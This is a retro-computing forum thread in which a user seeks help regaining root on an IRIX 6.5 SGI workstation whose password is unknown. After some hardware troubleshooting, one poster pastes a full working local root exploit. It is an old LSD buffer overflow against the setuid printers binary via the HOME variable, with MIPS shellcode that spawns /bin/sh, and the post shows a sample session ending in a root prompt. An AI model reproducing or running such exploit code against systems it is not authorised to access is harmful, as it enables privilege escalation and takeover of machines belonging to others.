IRIXNetwork

Trippynet · 08-22-2018, 08:10 PM

Also check out Dina, it will allow a network install by hosting the VM on a PC or Mac. Although you'll need something that can mount IRIX CDs and read the EFS file system on them. When I set up Dina myself, I used my Indigo2 to read the disks, so I don't have experience of reading them on a PC or Mac.

Root passwords can be removed, but you need either a second SGI, or a second disk with IRIX on it. I'd advise not wiping the HDD if you can in case it has some nice software on it. Better to get a replacement disk, get IRIX onto it somehow, then remove the root password from your current HDD.

The lack of a display could be due to either a res/refresh rate your monitor doesn't support, or IRIX is running in headless mode. You'll need single user access to fix though...

bjames · 08-22-2018, 11:23 PM

I have a similar error on startup for my octan “hw/node/xtalk/...” but everyone works perfect. This came up after installing a fresh version of Irix after repartitioning the hard drive.

I don’t know what it means, but I don’t have any other issues. I will monitor this thread hoping some chimes in with a possible solution.

PacMaN_2k1 · 08-23-2018, 01:17 PM

finally i'm in the system :) no errors on startup anymore ;)
i changed to another keyboard and another mouse(original ps2, before that i used usb with adapter->worked in prom but didn't boot into irix)
when i started the system today without a mouse it finally came up ->EUREKA!
now i need to see if i can change the root pw or i really have to reinstall... but so far the system runs very well!!! :)

gijoe77 · 08-23-2018, 01:39 PM

Check to see if you can log into any accounts, like demos, guest, etc. If you can log in, you might be able to just get root (depending on the version of irix)

PacMaN_2k1 · 08-23-2018, 01:40 PM

yeah i get into guest, demos and another account by the pro owner i think, only root needs pw.

PacMaN_2k1 · 08-23-2018, 02:18 PM

it's version 6.5.1.5

gijoe77 · 08-23-2018, 09:19 PM

There are some expliots you can run to gain root, I'm away for a week so if you don't figured it out by then I'll get something to you when I get back home next friday

gijoe77 · 09-01-2018, 08:45 AM

if the system has a compiler your golden, compile this code

Code:
/*## copyright LAST STAGE OF DELIRIUM jun 2003 poland *://lsd-pl.net/ #*/

/*## libdesktopicon.so $HOME                                          #*/

#define NOPNUM 1300

#define ADRNUM 900

#define PCHNUM 400

char setreuidcode[]=

    "\x30\x0b\xff\xff"    /* andi    $t3,$zero,0xffff     */

    "\x24\x02\x04\x01"    /* li      $v0,1024+1           */

    "\x20\x42\xff\xff"    /* addi    $v0,$v0,-1           */

    "\x03\xff\xff\xcc"    /* syscall                      */

    "\x30\x44\xff\xff"    /* andi    $a0,$v0,0xffff       */

    "\x31\x65\xff\xff"    /* andi    $a1,$t3,0xffff       */

    "\x24\x02\x04\x64"    /* li      $v0,1124             */

    "\x03\xff\xff\xcc"    /* syscall                      */

;

char shellcode[]=

    "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */

    "\x24\x02\x03\xf3"    /* li      $v0,1011             */

    "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */

    "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */

    "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */

    "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */

    "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */

    "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */

    "\x03\xff\xff\xcc"    /* syscall                      */

    "/bin/sh"

;

char jump[]=

    "\x03\xa0\x10\x25"    /* move    $v0,$sp              */

    "\x03\xe0\x00\x08"    /* jr      $ra                  */

;

char nop[]="\x24\x0f\x12\x34";

main(int argc,char **argv){

    char buffer[10000],adr[4],pch[4],*b,*envp[2];

    int i;

    printf("copyright LAST STAGE OF DELIRIUM jun 2003 poland  //lsd-pl.net/\n");

    printf("libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 ");

    printf("IP:ALL\n\n");

    if(argc!=2){

        printf("usage: %s xserver:display\n",argv[0]);

        exit(-1);

    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8580+3056+600;

    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8580+400+31552;

    envp[0]=buffer;

    envp[1]=0;

    b=buffer;

    sprintf(b,"HOME=");

    b+=5;

    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];

    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];

    for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;

    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];

    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];

    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];

    *b=0;

    execle("/usr/sbin/printers","lsd","-display",argv[1],0,envp);

}

here is what it should look like (this was on a 6.5.22m machine, wont work on 6.5.30):

Code:
bash-4.2$ cc -o foo x.c

bash-4.2$ ./foo localhost:0.0

copyright LAST STAGE OF DELIRIUM jun 2003 poland  //lsd-pl.net/

libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 IP:ALL

#

If you don't have a compiler, there was a way to compile stuff in earlier versions of irix using the built-in compiler the system uses for building the kernel, but my notes fail me and I don't recall how to do it...

Here is more info for the exploit I posted above:

http://www.mediafire.com/file/i29oebpyr6...ar.gz/file

Login
Username:
Password:	Lost Password?
	Remember me